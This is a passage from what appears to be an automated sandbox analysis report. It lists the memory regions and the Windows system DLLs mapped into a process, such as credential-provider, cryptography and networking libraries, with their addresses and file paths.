"windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 37526 start_va = 0x250000 end_va = 0x251fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 37527 start_va = 0x660000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 37528 start_va = 0x74be0000 end_va = 0x74bfdfff entry_point = 0x74be0000 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 37529 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 37530 start_va = 0x74bc0000 end_va = 0x74bd1fff entry_point = 0x74bc0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 37531 start_va = 0x520000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 37532 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 37535 start_va = 0x74ac0000 end_va = 0x74bb4fff entry_point = 0x74ac0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 37536 start_va = 0x850000 end_va = 0xb1efff entry_point = 0x850000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 37537 start_va = 0x74a80000 end_va = 0x74abffff entry_point = 0x74a80000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 37538 start_va = 0x6a0000 end_va = 0x81ffff entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 37539 start_va = 0x748f0000 end_va = 0x74a7ffff entry_point = 0x748f0000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 37540 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 37541 start_va = 0x74830000 end_va = 0x748e1fff entry_point = 0x74830000 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll") Region: id = 37543 start_va = 0x260000 end_va = 0x261fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 37544 start_va = 0x270000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 37545 start_va = 0x74800000 end_va = 0x7482efff entry_point = 0x74800000 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 37546 start_va = 0x6f0000 end_va = 0x72ffff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 37547 start_va = 0x7e0000 end_va = 0x81ffff entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 37548 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 37549 start_va = 0x4a0000 end_va = 0x4a6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 37550 start_va = 0x4b0000 end_va = 0x4b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 37551 start_va = 0xb20000 end_va = 0xf12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 37552 start_va = 0x747c0000 end_va = 0x747f7fff entry_point = 0x747c0000 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 37554 start_va = 0x4c0000 end_va = 0x4c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 37555 start_va = 0x747b0000 end_va = 0x747b8fff entry_point = 0x747b0000 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 37556 start_va = 0x560000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 37557 start_va = 0x74770000 end_va = 0x747a8fff entry_point = 0x74770000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 37558 start_va = 0x774b0000 end_va = 0x7764cfff entry_point = 0x774b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 37559 start_va = 0x75f20000 end_va = 0x75f46fff entry_point = 0x75f20000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 37560 start_va = 0x75f00000 end_va = 0x75f11fff entry_point = 0x75f00000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 37561 start_va = 0x74750000 end_va = 0x74762fff entry_point = 0x74750000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 37562 start_va = 0x730000 end_va = 0x7affff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 37563 start_va = 0x74720000 end_va = 0x7474efff entry_point = 0x74720000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 37564 start_va = 0x4e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 37565 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 37566 start_va = 0x500000 end_va = 0x500fff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 37567 start_va = 0x6a0000 end_va = 0x6a0fff entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 37568 start_va = 0x6b0000 end_va = 0x6b0fff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 37569 start_va = 0x6c0000 end_va = 0x6c0fff entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 37570 start_va = 0x6d0000 end_va = 0x6d0fff entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 37571 start_va = 0x6e0000 end_va = 0x6e0fff entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 37572 start_va = 0x7b0000 end_va = 0x7b0fff entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 37573 start_va = 0x7c0000 end_va = 0x7c0fff entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 37574 start_va = 0x7d0000 end_va = 0x7d0fff entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 37575 start_va = 0x820000 end_va = 0x820fff entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 37576 start_va = 0x830000 end_va = 0x830fff entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 37577 start_va = 0xf20000 end_va = 0xf20fff entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 37578 start_va = 0xf30000 end_va = 0xf30fff entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 37579 start_va = 0xf40000 end_va = 0xf40fff entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 37580 start_va = 0xf50000 end_va = 0xf50fff entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 37581 start_va = 0xf60000 end_va = 0xf60fff entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Region: id = 37582 start_va = 0xf70000 end_va = 0xf70fff entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 37583 start_va = 0xf80000 end_va = 0xf80fff entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 37584 start_va = 0xf90000 end_va = 0xf90fff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 37585 start_va = 0xfa0000 end_va = 0xfa0fff entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 37586 start_va = 0xfb0000 end_va = 0xfb0fff entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 37587 start_va = 0xfc0000 end_va = 0xfc0fff entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" Region: id = 37588 start_va = 0xfd0000 end_va = 0xfd0fff entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 37589 start_va = 0xfe0000 end_va = 0xfe0fff entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 37590 start_va = 0xff0000 end_va = 0xff0fff entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 37591 start_va = 0x1000000 end_va = 0x1000fff entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 37592 start_va = 0x1010000 end_va = 0x1010fff entry_point = 0x0 region_type = private name = "private_0x0000000001010000" filename = "" Region: id = 37593 start_va = 0x1020000 end_va = 0x1020fff entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 37594 start_va = 0x1030000 end_va = 0x1030fff entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 37595 start_va = 0x1040000 end_va = 0x1040fff entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 37596 start_va = 0x1050000 end_va = 0x1050fff entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 37597 start_va = 0x1060000 end_va = 0x1060fff entry_point = 0x0 region_type = private name = "private_0x0000000001060000" filename = "" Region: id = 37598 start_va = 0x1070000 end_va = 0x1070fff entry_point = 0x0 region_type = private name = "private_0x0000000001070000" filename = "" Region: id = 37599 start_va = 0x1080000 end_va = 0x1080fff entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 37600 start_va = 0x1090000 end_va = 0x1096fff entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 37601 start_va = 0x10a0000 end_va = 0x10a9fff entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 37602 start_va = 0x10b0000 end_va = 0x10b6fff entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 37603 start_va = 0x10c0000 end_va = 0x10e3fff entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 37604 start_va = 0x10f0000 end_va = 0x10f9fff entry_point = 0x0 region_type = private name = "private_0x00000000010f0000" filename = "" Region: id = 37605 start_va = 0x1100000 end_va = 0x1106fff entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 37606 start_va = 0x1130000 end_va = 0x1167fff entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 37607 start_va = 0x1110000 end_va = 0x1119fff entry_point = 0x0 region_type = private name = "private_0x0000000001110000" filename = "" Region: id = 37608 start_va = 0x1120000 end_va = 0x1126fff entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 37609 start_va = 0x1170000 end_va = 0x1179fff entry_point = 0x0 region_type = private name = "private_0x0000000001170000" filename = "" Region: id = 37610 start_va = 0x1180000 end_va = 0x1180fff entry_point = 0x0 region_type = private name = "private_0x0000000001180000" filename = "" Region: id = 37611 start_va = 0x1190000 end_va = 0x1190fff entry_point = 0x0 region_type = private name = "private_0x0000000001190000" filename = "" Region: id = 37612 start_va = 0x11a0000 end_va = 0x11a0fff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 37613 start_va = 0x11b0000 end_va = 0x11b0fff entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 37614 start_va = 0x11c0000 end_va = 0x11c0fff entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 37615 start_va = 0x11d0000 end_va = 0x11d1fff entry_point = 0x0 region_type = private name = "private_0x00000000011d0000" filename = "" Region: id = 37616 start_va = 0x11e0000 end_va = 0x11e0fff entry_point = 0x0 region_type = private name = "private_0x00000000011e0000" filename = "" Region: id = 37617 start_va = 0x11f0000 end_va = 0x11f1fff entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 37618 start_va = 0x1200000 end_va = 0x1200fff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 37619 start_va = 0x1210000 end_va = 0x1211fff entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 37620 start_va = 0x1220000 end_va = 0x1220fff entry_point = 0x0 region_type = private name = "private_0x0000000001220000" filename = "" Region: id = 37621 start_va = 0x1230000 end_va = 0x1231fff entry_point = 0x0 region_type = private name = "private_0x0000000001230000" filename = "" Region: id = 37622 start_va = 0x1240000 end_va = 0x1240fff entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 37623 start_va = 0x1250000 end_va = 0x1250fff entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Region: id = 37624 start_va = 0x1260000 end_va = 0x1260fff entry_point = 0x0 region_type = private name = "private_0x0000000001260000" filename = "" Region: id = 37625 start_va = 0x1270000 end_va = 0x1270fff entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 37626 start_va = 0x1280000 end_va = 0x1280fff entry_point = 0x0 region_type = private name = "private_0x0000000001280000" filename = "" Region: id = 37627 start_va = 0x1290000 end_va = 0x1290fff entry_point = 0x0 region_type = private name = "private_0x0000000001290000" filename = "" Region: id = 37628 start_va = 0x12a0000 end_va = 0x12a0fff entry_point = 0x0 region_type = private name = "private_0x00000000012a0000" filename = "" Region: id = 37629 start_va = 0x12b0000 end_va = 0x12b0fff entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 37630 start_va = 0x12c0000 end_va = 0x12c0fff entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 37631 start_va = 0x12d0000 end_va = 0x12d0fff entry_point = 0x0 region_type = private name = "private_0x00000000012d0000" filename = "" Region: id = 37632 start_va = 0x12e0000 end_va = 0x12e0fff entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 37633 start_va = 0x12f0000 end_va = 0x12f0fff entry_point = 0x0 region_type = private name = "private_0x00000000012f0000" filename = "" Region: id = 37634 start_va = 0x1300000 end_va = 0x1300fff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 37635 start_va = 0x1310000 end_va = 0x1310fff entry_point = 0x0 region_type = private name = "private_0x0000000001310000" filename = "" Region: id = 37636 start_va = 0x1320000 end_va = 0x1320fff entry_point = 0x0 region_type = private name = "private_0x0000000001320000" filename = "" Region: id = 37637 start_va = 0x1330000 end_va = 0x1330fff entry_point = 0x0 region_type = private name = "private_0x0000000001330000" filename = "" Region: id = 37638 start_va = 0x1340000 end_va = 0x1340fff entry_point = 0x0 region_type = private name = "private_0x0000000001340000" filename = "" Region: id = 37639 start_va = 0x1350000 end_va = 0x1350fff entry_point = 0x0 region_type = private name = "private_0x0000000001350000" filename = "" Region: id = 37640 start_va = 0x1360000 end_va = 0x145ffff entry_point = 0x0 region_type = private name = "private_0x0000000001360000" filename = "" Region: id = 37641 start_va = 0x1460000 end_va = 0x27b4fff entry_point = 0x1460000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 37642 start_va = 0x74620000 end_va = 0x7471afff entry_point = 0x74620000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 37643 start_va = 0x4d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 37644 start_va = 0x27c0000 end_va = 0x27c0fff entry_point = 0x0 region_type = private name = "private_0x00000000027c0000" filename = "" Region: id = 37645 start_va = 0x27d0000 end_va = 0x2cc1fff entry_point = 0x0 region_type = private name = "private_0x00000000027d0000" filename = "" Region: id = 37646 start_va = 0x2cd0000 end_va = 0x31c1fff entry_point = 0x0 region_type = private name = "private_0x0000000002cd0000" filename = "" Region: id = 37647 start_va = 0x31d0000 end_va = 0x32cffff entry_point = 0x0 region_type = private name = "private_0x00000000031d0000" filename = "" Region: id = 37648 start_va = 0x32d0000 end_va = 0x32d1fff entry_point = 0x0 region_type = private name = "private_0x00000000032d0000" filename = "" Region: id = 37649 start_va = 0x2cd0000 end_va = 0x31c1fff entry_point = 0x0 region_type = private name = "private_0x0000000002cd0000" filename = "" Region: id = 37650 start_va = 0x32e0000 end_va = 0x37d1fff entry_point = 0x0 region_type = private name = "private_0x00000000032e0000" filename = "" Region: id = 37651 start_va = 0x37e0000 end_va = 0x3cd1fff entry_point = 0x0 region_type = private name = "private_0x00000000037e0000" filename = "" Region: id = 37652 start_va = 0x74610000 end_va = 0x74616fff entry_point = 0x74610000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 37653 start_va = 0x27d0000 end_va = 0x2897fff entry_point = 0x27d0000 region_type = mapped_file name = "basebrd.dll" filename = "\\Windows\\Branding\\Basebrd\\basebrd.dll" (normalized: "c:\\windows\\branding\\basebrd\\basebrd.dll") Region: id = 37654 start_va = 0x27d0000 end_va = 0x2897fff entry_point = 0x27d0000 region_type = mapped_file name = "basebrd.dll" filename = "\\Windows\\Branding\\Basebrd\\basebrd.dll" (normalized: "c:\\windows\\branding\\basebrd\\basebrd.dll") Region: id = 37655 start_va = 0x28a0000 end_va = 0x28b1fff entry_point = 0x0 region_type = private name = "private_0x00000000028a0000" filename = "" Region: id = 37656 start_va = 0x27d0000 end_va = 0x27e1fff entry_point = 0x0 region_type = private name = "private_0x00000000027d0000" filename = "" Region: id = 37657 start_va = 0x2830000 end_va = 0x286ffff entry_point = 0x0 region_type = private name = "private_0x0000000002830000" filename = "" Region: id = 37658 start_va = 0x2960000 end_va = 0x299ffff entry_point = 0x0 region_type = private name = "private_0x0000000002960000" filename = "" Region: id = 37659 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 37660 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 37661 start_va = 0x74600000 end_va = 0x7460cfff entry_point = 0x74600000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 37662 start_va = 0x75c10000 end_va = 0x75c38fff entry_point = 0x75c10000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 37663 start_va = 0x745e0000 end_va = 0x745f3fff entry_point = 0x745e0000 region_type = mapped_file name = "vaultcredprovider.dll" filename = "\\Windows\\System32\\VaultCredProvider.dll" (normalized: "c:\\windows\\system32\\vaultcredprovider.dll") Region: id = 37664 start_va = 0x745b0000 end_va = 0x745d6fff entry_point = 0x745b0000 region_type = mapped_file name = "smartcardcredentialprovider.dll" filename = "\\Windows\\System32\\SmartcardCredentialProvider.dll" (normalized: "c:\\windows\\system32\\smartcardcredentialprovider.dll") Region: id = 37666 start_va = 0x27f0000 end_va = 0x27f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027f0000" filename = "" Region: id = 37667 start_va = 0x2870000 end_va = 0x28bffff entry_point = 0x0 region_type = private name = "private_0x0000000002870000" filename = "" Region: id = 37668 start_va = 0x75c40000 end_va = 0x75c4dfff entry_point = 0x75c40000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 37669 start_va = 0x74580000 end_va = 0x745acfff entry_point = 0x74580000 region_type = mapped_file name = "biocredprov.dll" filename = "\\Windows\\System32\\BioCredProv.dll" (normalized: "c:\\windows\\system32\\biocredprov.dll") Region: id = 37671 start_va = 0x2800000 end_va = 0x2801fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002800000" filename = "" Region: id = 37672 start_va = 0x75b30000 end_va = 0x75b37fff entry_point = 0x75b30000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 37673 start_va = 0x75b80000 end_va = 0x75b9afff entry_point = 0x75b80000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 37674 start_va = 0x74560000 end_va = 0x74570fff entry_point = 0x74560000 region_type = mapped_file name = "winbio.dll" filename = "\\Windows\\System32\\winbio.dll" (normalized: "c:\\windows\\system32\\winbio.dll") Region: id = 37675 start_va = 0x74530000 end_va = 0x7455afff entry_point = 0x74530000 region_type = mapped_file name = "credui.dll" filename = "\\Windows\\System32\\credui.dll" (normalized: "c:\\windows\\system32\\credui.dll") Region: id = 37676 start_va = 0x74520000 end_va = 0x7452bfff entry_point = 0x74520000 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\System32\\vaultcli.dll" (normalized: "c:\\windows\\system32\\vaultcli.dll") Region: id = 37677 start_va = 0x74500000 end_va = 0x74510fff entry_point = 0x74500000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 37678 start_va = 0x744f0000 end_va = 0x744f8fff entry_point = 0x744f0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 37679 start_va = 0x753c0000 end_va = 0x753d8fff entry_point = 0x753c0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 37680 start_va = 0x744e0000 end_va = 0x744eefff entry_point = 0x744e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 37681 start_va = 0x744d0000 end_va = 0x744defff entry_point = 0x744d0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 37683 start_va = 0x2810000 end_va = 0x2811fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002810000" filename = "" Region: id = 37684 start_va = 0x2820000 end_va = 0x282ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002820000" filename = "" Region: id = 37685 start_va = 0x29a0000 end_va = 0x2aa0fff entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 37686 start_va = 0x29a0000 end_va = 0x2aa0fff entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 37687 start_va = 0x29a0000 end_va = 0x2aa0fff entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 37688 start_va = 0x29a0000 end_va = 0x2aa0fff entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 37689 start_va = 0x29a0000 end_va = 0x2aa0fff entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 37690 start_va = 0x744a0000 end_va = 0x744c0fff entry_point = 0x744a0000 region_type = mapped_file name = "certcredprovider.dll" filename = "\\Windows\\System32\\certCredProvider.dll" (normalized: "c:\\windows\\system32\\certcredprovider.dll") Region: id = 37691 start_va = 0x74430000 end_va = 0x74491fff entry_point = 0x74430000 region_type = mapped_file name = "rasplap.dll" filename = "\\Windows\\System32\\rasplap.dll" (normalized: "c:\\windows\\system32\\rasplap.dll") Region: id = 37693 start_va = 0x743d0000 end_va = 0x74421fff entry_point = 0x743d0000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 37694 start_va = 0x743b0000 end_va = 0x743c4fff entry_point = 0x743b0000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 37695 start_va = 0x77120000 end_va = 0x77154fff entry_point = 0x77120000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 37696 start_va = 0x770f0000 end_va = 0x770f5fff entry_point = 0x770f0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 37697 start_va = 0x743a0000 end_va = 0x743acfff entry_point = 0x743a0000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 37706 start_va = 0x75740000 end_va = 0x75755fff entry_point = 0x75740000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 37707 start_va = 0x28c0000 end_va = 0x28fbfff entry_point = 0x28c0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 37708 start_va = 0x28c0000 end_va = 0x28fbfff entry_point = 0x28c0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 37709 start_va = 0x28c0000 end_va = 0x28fbfff entry_point = 0x28c0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 37710 start_va = 0x28c0000 end_va = 0x28fbfff entry_point = 0x28c0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 37711 start_va = 0x28c0000 end_va = 0x28fbfff entry_point = 0x28c0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 37712 start_va = 0x754e0000 end_va = 0x7551afff entry_point = 0x754e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 37715 start_va = 0x28c0000 end_va = 0x28f1fff entry_point = 0x28c0000 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 37716 start_va = 0x2920000 end_va = 0x295ffff entry_point = 0x0 region_type = private name = "private_0x0000000002920000" filename = "" Region: id = 37717 start_va = 0x2980000 end_va = 0x29bffff entry_point = 0x0 region_type = private name = "private_0x0000000002980000" filename = "" Region: id = 37718 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 37719 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 37720 start_va = 0x28c0000 end_va = 0x28f1fff entry_point = 0x28c0000 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 37721 start_va = 0x28c0000 end_va = 0x28f1fff entry_point = 0x28c0000 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 37722 start_va = 0x28c0000 end_va = 0x28f1fff entry_point = 0x28c0000 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 37723 start_va = 0x28c0000 end_va = 0x28f1fff entry_point = 0x28c0000 region_type = mapped_file name = "input.dll" filename = "\\Windows\\System32\\input.dll" (normalized: "c:\\windows\\system32\\input.dll") Region: id = 